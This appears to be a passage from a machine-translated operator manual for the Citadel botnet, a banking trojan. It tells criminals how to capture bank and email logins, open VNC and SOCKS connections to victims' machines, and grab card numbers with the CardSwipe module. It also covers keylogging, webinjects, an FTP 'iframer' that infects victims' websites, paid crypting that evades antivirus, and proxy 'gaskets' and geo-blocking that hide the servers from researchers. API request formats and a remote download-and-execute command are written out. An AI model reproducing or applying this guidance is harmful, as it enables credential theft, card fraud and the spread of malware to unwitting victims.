Mask URL: Here you specify the URL scheme * mail.ru * or http:// *. Bank.com * (you can play whatever you like, the asterisk help you)
Parameters: Enter here the name POST-variables that are on the form of a site that we catch. On the example of mail.ru, it will be and Login * Password *
The format of the parameters is simple, you can specify the "login =", you can specify the "login *", or just "login". Therefore, choose as you like, do not forget to test the mask.
The parameters are not case sensitive.
Notify in Jabber?: Put option if we want to each new captured the ACC come to you. Jabber is defined in the settings, you can specify multiple comma-separated.
IMPORTANT! To see the "Options" were written data Jabber-bot (Use only Jabber.org or Jabber.ru), with which all this will come to you.
Also, there is the possibility of creating Avtokonnekta with the bot, from which came a new Account section. Ie, to the gills you immediately comes account + port for a connection to the VNC / SOCKS.
Do not forget that running a context menu in front of bots, links, etc. via the right mouse button: you can delete any unwanted acca (send in the garbage), tagged as favorites, or enable / disable the settings.
Example of a table of statistics:
2 bots, 6 accounts, 5 live accounts (83%) to calculate% of live accounts on the basis of the bot did not appear on the network for more than 4 days, the account is considered dead.
Also, there is an API for quickly creating VNC / SOCKS connection to the desired bot, for example during the interception of the token or a message, you need to urgently go to the ACC under Holder, you inject a javascript / iframe URL to call api.php
* VNCController
* Api.php / <token> / vnc / connect? BotIP = 1.2.3.4 & protocol = VNC
* Api.php / <token> / vnc / connect? BotIP = 1.2.3.4 & protocol = SOCKS
* Api.php / <token> / vnc / connect? BotId = WIN-ABC123 & protocol = VNC
* /
define ('API_TOKEN_KEY', 'changethispassword');
And pass the IP or BotID, the script tells the bot to establish the connection and the data come to your zhabber. The timing depends on the setting in the configuration timer_stats Builder.
Here's a tip for working with bots on Win7/Vista: use Firefox portable for Win7/Vista - it works correctly. Do not forget to disable the wallpaper not to drive a lot of traffic. Also, to get to one of the directories - press the shortcut properties.
To connect to the bots, you must download yourself any VNC-client, for example, UltraVNC (http://www.uvnc.com/downloads/ultravnc.html)
Then specify in the IP-address of the connecting Windows Server (connector) and port-bot session, which is written in the admin or jabber-notification.
************************************************** ******************************
========================== >>>>> 6. Installing chekinga Web socks
************************************************** ******************************
Section "SOCKS" in the admin - no need to configure anything.
************************************************** ******************************
========================== >>>>> 7. Installing the log parser
************************************************** ******************************
The module consists of a "Links" section.
In order to create the structure of the links, you must click "Parse new reports" before using the module. If the unit freezes due to heavy load or a large amount of data, it is recommended to temporarily remove a gate from a server that does not clog the base, and after use, to return back to the gate (gate.php)
************************************************** ******************************
========================== >>>>> 8. Installing CardSwipe
************************************************** ******************************
The module is wired to the exe file, the setting through the config file. There are 2 options in StaticConfig
enable_luhn10_get 1
enable_luhn10_post 1
The first parameter: GET LUHN10 - analyzes data in GET-requests and WinSocket / Wininet for cards and dumps the algorithm en.wikipedia.org / wiki / Luhn_algorithm
POST LUHN10 - analyzes the data to https:// POST requests.
By tradition, all the important data is present only in the POST-requests.
To find the map, select the type of report: "LUHN10 inquiry" into the "Search Database" in the admin area.
 
************************************************** ******************************
========================== >>>>> 9. Working with the crypt panel
************************************************** ******************************
There is a section "crypt exe" aka "crypt exe" and displayed it in the admin Citadel. If it is not present, then read below how to activate it.
It is necessary in order to enable you to grant access to your kripter and he periodically perezalivat exe file that bots download and update.
At the same time, kripter does not have access to the rest of the admin, for it is only available in this section.
For a start, we activate this partition at home, for this we go to the section "Users", click on your username below and see a list of options available to us. 2 points to note:
r_svc_crypter_crypt - This item gives privileges perezalivat exe file.
r_svc_crypter_pay - This item gives a privilege to lead the table by perezalivke payments.
Next, create a new user and give him ONLY "r_svc_crypter_crypt" law, pass login and password kripter and it can form a perezalivat exe files from the files /
Do not forget to put a chmod 777 on the folder and trusted access only to trusted parties.
Now, once kripter perezalivat exe file, there is a new entry in the table that the exe file is not paid for, you, in turn, check whether all is OK, check off at the admin that such number of crypts X paid.
You can enter data for Jabber-notice inspection scan4you in the same section.
 
************************************************** ******************************
========================== >>>>> 10. Installation of the system proxy (gasket config button "gather pad")
************************************************** ******************************
Laying suschestvet to hide from the tracker with the path to the config files and exe.
Unnecessarily file.php from my webserver, is responsible for issuing the config files and exe bots, we can move this system to any FTP-host (gasket) and used to hide the real ways.
Gasket can obscure the way to the gate, the gate to have a separate script proksifikator in papke other.
The only drawback proksifikatora gate: it does not transfer video files to your server.
Note that file.php from my webserver, has nothing to do and moreover is not compatible with file.php, which generates a button to "collect the gasket." This button must be pressed only when your configuration is fully configured.
Generation pads to protect the config from trackers (complete system redirects) BETA-version.
Generator installation solves the problem of transfer file.php on a single host, you can redirect as juzat-pad to your main config file and exe to the analysis of your exe, reversers and trackers posted
Generation pads through builder for this new button "Build the bot file-proxy" / "Collect the gasket."
On the way out we get 2 files, file.php, file_config.php (the file names do not change)
WARNING: file_config.php contains your encryption key in a modified form, it is taken out of your config, so when generating gate configuration must be configured and working.
Now load the files file_config, php, file.php on the gasket and create a folder in the same files, which put the exe, config + module files.
To deny direct access to files in the folder files create. Htaccess file as follows:
deny from all
In the settings config ask url_config1, url_loader before laying.
If you want to protect the gate and create a seal, I've found there are other / redir.php, open it and set the path to the real gate
/ / URL of the original server.
$ Url = "http://localhost/s.php";
 
After that, keep sripta under any name and specify the path of the bot config as the gate (url_server)
It is very important! To the host were allowed sockets in PHP, otherwise will not work.
You can check this by creating a file with 1.php <? Php phpinfo ();?>
It should display Sockets Support enabled
Gaskets are not currently transmit video and screenshots, logs only.
************************************************** ******************************
========================== >>>>> 11. A brief tutorial on the new ficham admin
************************************************** ******************************
1) In the admin has a new section "Efficacy and Safety", we spent the integration with the service scan4you, and you can now just one click away to check all of your exe builds on palevnost once in the admin Citadel, also, you can set up automatic file scan once a day and if one of your files scorched more than a third anti-virus, you will immediately receive a notification in your Jabber, so you can
immediately replace the exe. Now, the mechanism will work for you automatically.
=> To start, press Settings: inscribe there Scan4you Profile ID (imenno ID, DO NOT SIGN!!), Scan4you API Token, Jabber for notifications. Take these data into the profile settings scan4you.net
Then go to the Options section, and enter the data Jabber-bot (pre zaregat account for the bot), it is recommended juzat jabber.org unnecessarily with other servers may be problems due to incompatible protocol.
Everything is ready.
2) Some customers have complained about the fact that only 40% of the bots is updated to the new version exe, others can not upgrade for some unknown reason. Indeed, the bug remained since Zeus, we have investigated and corrected it. Now, a new parameter in config: timer_autoupdate 8
Wherein the predetermined time (in hours), as is often downloaded exe and restart the server (RC4 encryption_key key must be the same). 80% of the bots are now updated successfully, and the crypt of perezalivat exe, survivability has increased by 45%, your bots will have a very fresh and clean build.
The path to the executable file is taken from the section "url_loader", respectively, the more often you clean perezalivat exe, the cleaner exe file have your boots at home. They download it and restart, updating itself.
If you have a problem with that, as before, that only a small part of the bot is updated to the new exe, then the likely problem is that the heuristic antivirus or firing your new exe and does not run it.
 
3) Video format from bots changed to. Webm (HTML5), we have built online video player to the admin Citadel, now you can watch the video directly to your brauezere (recommended Firefox / Opera). Of the features: Fast назад-вперед/фулл-скрин/поиск video BotID, IP-address, date.
Many of you are using AZ and personal admin for injects / collection akkov etc. Would you like from your admin area to watch over the bay or how your inzhekt on the boat? It's Easy! We have created a system API-now you can pass BotID or IP-address of the script, and the API will return you a ready-made HTML-embed code of video on the bot and you can insert and view videos on any host without having to go to the admin panel.
 
4) Added a convenient analyzer parser system commands (CMDList) in the admin panel, you can now see the new format as a table, the results of executing system commands, such as: ipconfig, a list of PCs in the local network, a list of processes, etc.
A separate section of "CMD parser."
5) Now when installing build on the bot automatically lump sum is sent to the admin cleduschaya information: installed firewalls, anti-virus software installed, installed programs.
You can view information for a single bot, and for the entire botnet. We have created a separate section where you can see all the statistics in the form of visual graphics and calculations. Now you know who to fight ;)
The "Installed Software", if you see a lot of charts in "Unknown" on the boat so it is not necessary anti-virus or firewall. Also, pressing the search bot reports, you will see a new type of report.
6) The ability to "Selected logs" you can mark any interesting account (account) when searching for data in the admin and then easily find it unnecessarily it will be allocated a different color in the "Favorite Reports"
Also, you can add a bot to your favorites, no reports. The button "Make Favourite"
7) In the "Search in database" opportunity to connect with other Citadel database logs ("Connection with other DB").
For example, if you have old admin with logs, you can connect them and work with them.
The work is carried out only at the level of the search data logs and other features, such as VNC, comments - no.
To connect click "Settings" and enter data MySQL-database, then select it and click Connect.
Upon completion of the other base, again connect the main base so as not to get confused.
Connecting another database does not affect the functioning of the entire system.
8) In the "Search in database" appeared 2 new items: "stop words" and "Mask URL:"
The first allows you to exclude links from the trash after the issuance of the search, for example if you search for keyword is "bank" link and you will come across constantly "bankofbooks.com" enter it and it will not show up after a search, you can also save the aliases (alias) not to introduce this keyword is each time.
"Masks URL:" - allows you to set finer search and increase the speed of data retrieval. Here we are only looking at the links, not by content.
 
************************************************** ******************************
========================== >>>>> 12. Working with API (api.php)
************************************************** ******************************
Working with API.php. Through the API, you can pull the ftp-akkunty for any FTP-ifreymera.
* IFramerController:
* Api.php / <token> / iframer / ftpList
* Api.php / <token> / iframer / ftpList? State = all
* Api.php / <token> / iframer / ftpList? Date_from = 2012-12-31
* Api.php / <token> / iframer / ftpList? Date_from = 2012-12-31 & state = all
* Api.php / <token> / iframer / ftpList? Date_from = 2012-12-31 & state = all & plaintext = 1
 
Through the API, you can send Jabber-messages (eg embedding a link to inject), api considers options jabber-bot from the relevant section in the admin area, and considers all the recipients in the Jabber Notifier.
 
* JabberController:
* Api.php / <token> / jabber / send? Message = Hello% 20world!
 
Through the API, you can get the status of bots (online / offline)
* BotsController
* Api.php / <token> / bots / online? BotId [] = A-BOT & botId [] = B-BOT & ...
 
 
=> Manuals for exporting video files to adminok AZ-based online player.
Requests of this kind:
/ Api.php / megakey / video / list.php? Botnet = COOL & botIP = 111.111.111.111
/ Api.php / megakey / video / list.php? Botnet = COOL & botId = 017_B4DF7611E03FF4C8
issued in response to php-arrays or JSON
Query format:
api.php / <security-token> / video / <action> [. <extension>]? <params>
<security-token> the-key that you specify in the script api.php and it is necessary to authorize the server.
<action> - team
<extension> - (optional) expansion: the output format. If you omit the - see the debug-output. Vozvozhnost values:. Dump,. Php,. Json,. Xml
<params> - function parameters of the controller (you can see in the code)
Examples of queries:
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botIP=1.2.3.4
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123
http://citadelhost/folder/api.php/ahro4uNg/video/list?botnet=COOL&botId=WIN-ABC123&embed=1
 
Botnet parameter is optional.
citadelhost/folder/api.php/ahro4uNg/video/list? botnet = COOL & botId = SURAKSHYA-PC_775A658D6522DF69
And again, substituting the expansion - you can get the desired format:
 
 
 
Adding the parameter & embed = 1, we can get the right HTML-code inserts for all videos, but I do not recommend: there may be many) there is a separate function for this is.
Example without passing the name of a botnet:
http://citadelhost/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69
http://citadelhost/folder/api.php/ahro4uNg/video/list?botId=SURAKSHYA-PC_775A658D6522DF69&embed=1
 
For other examples of work with the API, see the comments in the script api.php
************************************************** ******************************
========================== >>>>> 13. How to update the admin area and one during the next bot version of Citadel
************************************************** ******************************
Perezaleyte and overwrite all of the scripts on the server with the new archive and go to the folder / install /, clicking Update - wait until your table will be updated, it may take a long time. The data will not be lost.
If you have too jam-packed database, it makes sense to put your admin area again in a new folder and throw it on the bot team user_execute http://www.host.com/newcitadel.exe
Note the format of the config with each new version may change, so in order for everything to work correctly, adjust NEW (going to the version of the archive) to your configuration settings and perezaleyte it to your files, along with the exe-file and modules. Pay attention to the new options will appear in the configuration file that we give with the Builder's.
After that, in order to get your boots are updated to the new version, give the command user_execute http://www.temphost.com/newcitadel.exe
Check that the exe is available from the web on the link above.
************************************************** ******************************
========================== >>>>> 14. Description of the options in the config Builder
************************************************** ******************************
disable_cookies 1/0 - If set to 1, cookies will not be sent to the admin panel and you. sol files will not be deleted from a PC Holder. If set to 0, all. Sol files will be deleted and the cookies will be sent to your admin area.
disable_antivirus 1/0 - If set to 1, the module will be off MiniAV.
enable_luhn10_get 1 - Module CardSwipe, if one is to be intercepting cards / dumps in the GET request. MODULE sewn into the EXE file!
enable_luhn10_post 1 - Module CardSwipe, if one is to be intercepting cards / dumps in the POST request. MODULE sewn into the EXE file!
remove_certs 1 - If there is one, will not send certificates.
timer_autoupdate 8 - Time in hours, auto-update exe from the folder files /. In other words the number of hours, download and run the exe every time.
disable_httpgrabber 1 - If there is one, off Grabber HTTP reports and the server are only HTTPS reports on all browsers.
report_software 1 - If there is one, to send information about the firewall / antivirus / software in the admin area.
use_module_ffcookie 1 - If there is one, it will generate an export module cookies in Firefox, when you start the build, cookies are sent to the admin panel in a convenient format.
 
Section entry "WebFilters"
To activate the screen shots, insert Macka "@ * paypal.com / *"
If you need screenshots of the full screen, the "@ @ * paypal.com / *"
To activate video recording, "# * paypal.com / *"
 
Subsection
entry HttpVipUrls
"* Facebook.com / *"
end
 
Allows you to add links-exclusion (http://) in the absence of HTTP-grabbing (disable_httpgrabber 1). Ie, if you need only HTTPS :/ / logs, but a couple of http:// links that you want to see in the logs, then here you set such links on the diagram above, without specifying the protocol, ie just the name Domain * bankofamerica.com *
 
entry "WebFakes" - VEBFEYKI DO NOT WORK! But the section is not removed.
 
************************************************** ******************************
========================== >>>>> 15. FTP-ifreymer. Description and setting
************************************************** ******************************
A) Script ifreymera
Poured on the left site and used as a "spacer": performs all the work. Click "Download Script" and fill it by ftp to host some left.
It is run by cron-specific task from your admin area.
Debugging capabilities:
* Create a folder next to the script iframer / write permissions. There he can save the preview ifreyminga files.
* Create next to the script file 'iframer.php.log' (the name of the script with the extension +. Log): there it will automatically write logs of actions found the folder ...
* Do not forget to set the right 666.777 if you want to debug.
You can download it on the page ifreymera in socket: [download].
Physically, he is in the system / utils /. Here it is not directly caused by simply stored :)
Ifreymer himself to work does not require any file and write permission: he carefully uses the PHP-session to store dannyah.
B) Configuration
Allows you to set:
* URL-ifreymera script to run.
* HTML-code for inserting
* Mode of action. 'Off' off, 'inject' embed HTML-code, 'preview' preview without modifying the files on FTP: proifreymlennye save files in the folder 'iframed /' next to the script (if it exists and is writable)
* The method of injection: smart (it does not hurt PHP / JS / ASP files), write in the end, the dubbing
* Depth bypass folders (Levels 1 to 50)
* Masks for files and folders.
Ifreymitsya file only if the folder and the file come to one of the masks.
If the folder has coincided with a mask - how deep to crawl up (in case of deeply mortgaged public_html)
C) The principle of client-side
First, prior to each phase of the communication socket with ifreymerom last the self-test: Are all the vital functions to work on, predictably leads to a server, .... If the selftest failed - no work will be performed.
 
One cronjob every 10 minutes collects new ftp-accounts from the database and creates jobs. Repeated ftp-acca not allowed.
These accounts are fast to ifreymer script and added to the list of "job", regardless of whether he's running or not.
 
Another cronjob also runs every 10 minutes. He just runs the script ifreymer if it still works - nothing happens, but if he's dead (for example, time limit) - will restart. Threshold restart 120s
 
And finally, the last cronjob: he asks every minute ifreymer as he has his work: how many jobs are much in line, how ready. If you have accounts with which he had already finished - they pulled out and saved. On ifreymere these acca removed to save memory.
 
In order to avoid possible errors entire two-stage data transmission: request, response, request a confirmation action.
If, during the day there are no results for your account - it goes again.
D) The principle of operation of the ifreymera
In the beginning of the script is a list of file extensions to ignore. They do not change even if approached one of the masks.
Ifreymer stores the data in a session, they are included on all hosting servers and there is no need to play with human or search the folder to write :) It is written with the ability to work even under PHP4.
 
Ifreymer able to breathe properly and restarted on timelimit'u: no important data is lost, it can continue from where it stopped.
When you break the connection ifreymer able to reconnect the next time.
 
The phases of work:
1. Attempting Connection. If it fails three times in a row - acc marked as invalid.
If many akkov which can not connect - ifreymer can "freezing" raking timeouts. This is normal: it tries :)
2. Authentication attempt. If you can not - acc invalid.
3. Listing all the folders and files to a specified depth. Sample files and folders matching the mask specified in the admin panel. Had come up to bypass the folder depth increases.
4. Phase ifreyminga. I note that in the mode of 'preview' files on the FTP does not change!
For each file is determined by its type (by extension) that defines the method ifreyminga. Supported: html, php, CSS, JS, asp (and equivalent expansion)
To add code ifreyma special marker to avoid accidental re ifreyminga file.
The smart code is added to the top of php-file, though he ifreym output at the end :)
In append mode code is appended to the file. Cleverly is determined not to break the syntax of the code. JS-files are infected through injection of code drawing a iframe.
* At all stages of the statistics are collected, the list of changed files.
 
Ifreymerom run two tasks:
* "Start" works off automatically every 10 minutes: he fasted new accounts, and includes a long process of verification.
* "Fee" - every minute, takes away that it is prepared
E) Interface
Ifreymera shows the state (in fact, the state of cron-tasks). You can manually pull the job to update the information.
Shows the list of accounts. For each: Status, error, a list of pages (by clicking), statistics (by clicking).
Invalid accounts are deleted in a day: povisel and gone.
 
*) The principle of work assignments and ifreymera on his fingers:
 
Setting the "start": Every 10 minutes
Get some new akkov and append them to the end of the task list.
Next ifreymer through the list of tasks (accounts)
Take the 1st acc. CONNECT. It did not happen during the 10s? Postpone, recheck.
Take the 2nd. LOGIN! Authorization but failed. With that done, it is invalid.
Take the third. Does not connect. Also recheck.
Take the 4th. Connected to. Logged. Parse .. ifreymim .. finished, it is valid.
Complete "collection":
it can always plug in and pull the intermediate results) Here is the 2nd and 4th, if they had time to work out.
When the 1st and 3rd acc word yet few disconnects - they, too, will be marked as invalid.
 
Features added later:
- Mode "check only". Speak for oneself
- Option: reifreyming accounts after N days. Each account after N days will be processed again.
- Replacement of old ifreym new code. If you change the HTML-code - it is not stupid to be added and will replace the old :)
- Option "ifreymit acca only yesterday." Will provide day to ignore the fact dotting)
- Logging of errors ifreymera (!)
- Intelligent detection of folders (they are indistinguishable from files)
- Reset button. Thanks to protect against re-ifreyma accounts it will not spoil :) Zaignorennye acca retained (ie not too spoiled)
- Selective ignore accounts (not ifreymit for nothing). Reported ignore accounts appear night and hide. If you do reset - it will and hung another day.
- Sort by: Recent Developments (found, shipped, processed), in chronological order from top to
- Manual release lever (full manual mode). This is done through clicks on the instructions above, if ifreymer mode "off"
For example, you click the first to receive new acca. Zaignoril desired, you click the second: they fly away for processing.
The third task - collecting results - always fulfills itself :)
 
************************************************** ******************************
========================== >>>>> 16. Module description "Keylogger processes"
************************************************** ******************************
To activate the keylogger, in the config Builder prescribes a new section:
entry "Keylogger"
processes "calc.exe; * notepad *"
time 1
end
* Notepad * finding the right process on behalf of the
calc.exe exact name of the process
Here we list a list of processes which we set the keylogger.
Let me remind you that a keylogger is enabled by default for all browsers, so use the module if you need to track separately, combined application.
time of 1 indicates the time in minutes, how many minutes in a row, since the application to record the key.
Section to be done in front of a section entry "CmdList" or after it.
 
To search for records in the admin area, select the type of report: "keylogger"
 
************************************************** ******************************
========================== >>>>> 17. Modular GeoIP botnet protection
************************************************** ******************************
To enable the module, go to "Settings" in the admin area, there is a point "Permitted country", put a check mark on or desired countries.
All countries that are not marked you automatically get to the ignore list, however, reports of them will still be written, but at the request config bot through file.php and send requests to the gate, a 404 error will be issued at the level of HTTP-server (you can check out a sniffer)
Budget option from abuse. Recommended only for small compartmentalized VIP-botnets to transfer the securities to a particular botnet bots.
If you notice a strong load on the server, immediately turn off the setting.
************************************************** ******************************
========================== >>>>> 18. The module "Double-log Cleaner"
************************************************** ******************************
To enable or disable the module, you must go to "Options" sub-functions - "Deduplication report" on or off.
If you notice a heavy load on the server, it is recommended to disable this module SSN is not designed for a large number of bots.
 
 
************************************************** ******************************
========================== >>>>> 19. Web module injects (WebInjects)
************************************************** ******************************
WebInjects. The module is designed for easy interaction with the holders through technology injects into browsers. The module allows you to inject progruz any specific BotID, country or botnet in just a few minutes, without having to edit the config. Everything works through the admin panel.
A brief educational program:
In the config bot section DynamicConfig, fit parameter url_webinjects "http://www.host.com/file.php" (way to file.php). Boat pulls this file every 2 minutes, taking out a pack injects, which gives the distribution system injects issue.
If the module is not necessary, since it creates an additional load, this line can be removed at all.
In the "Web injects" There are two sections: "The group vebinzhektov" and "Paki" is the first structure of "Group - INJECT - Members (admitted to the group)," and is responsible for managing all INJECT. The second section is responsible for setting the spread injects (how bots deliver inject and how much).
In the main menu, under "Members" to create a new user has rights "r_botnet_webinjects_coder" is a user who can manage the group, which will appoint an administrator privileges. In other words, if you make a developer injects into the admin account and create it, it will have the right to create and edit their inject them, others inject it does not see its list displays only injects. Ie, you can create groups of 5 and a 5-inject coders, so each person is responsible for his group (set injects). You see the statistics of what happens in the overall system and can unites all groups injects into one "pack", which will be progruzhen any and all bots, or a particular group, and a separate category of bots by class: the country or botnet.
In the admin there is a special easy visual editor with syntax highlighting injects. The format is fully compatible with zevsoformatom.
Sushestvuet several modes for packs.
Dual - when running a local file to inject from config + vebinzhekty.
Single - when only vebinzhekty, and the local file injects off.
Disabled - when vebinzhekty disabled and the local file with an injector works.
If by chance there was a mistake somewhere in the INJECT, the vebinzhekty not get together and you come DEBUG-report with information which pack (bundle) was not collected.
According to the information on the bot, you can see the history of injection test web injects, you can also search for DEBUG-bot reports and also look at the history of assemblies and error vebinzhektov.
If the bot receives several packs (bundles) where different modes of operation: dual, single, disabled then all of Bandlov automatically selected the most "narrow mode" work, such as single.
To work to do chmod 777 on the folder files / webinjects.
Boat constantly checks for updates of any of vebinzhektov, and if so, it updates it for himself.
Some aspects of the interface:
Limit of downloads - if you need to inject progruz XXXX times, regardless of the country, BotID or other symptoms.
In each pack (bundle) may include an injector of any group.
 
************************************************** ******************************
========================== >>>>> 20. General recommendation and FAQ
************************************************** ******************************
To avoid problems with the script on the server, it is recommended to install the PHP version is less than 5.
If you want a guarantee from the Swiss reverse, opening the files on the server, 100% protection against any trackers and ailments, we recommend you to install on your server binds to the country for which you are working.
For example, all your files will be available on http only user, who came from Spain and the rest, from other countries will be given 404.
This can be done using the GeoIP module to the server nginx, or set binding on DNS.
If interested, you can give the team a good administrators who can help in this matter.
How to do it and advice for the protection of a botnet, you can read the article in the "Knowledge Base" within the CPM.
Also, we want to draw attention to the fact that the build bot will NOT work with Proxifier'om!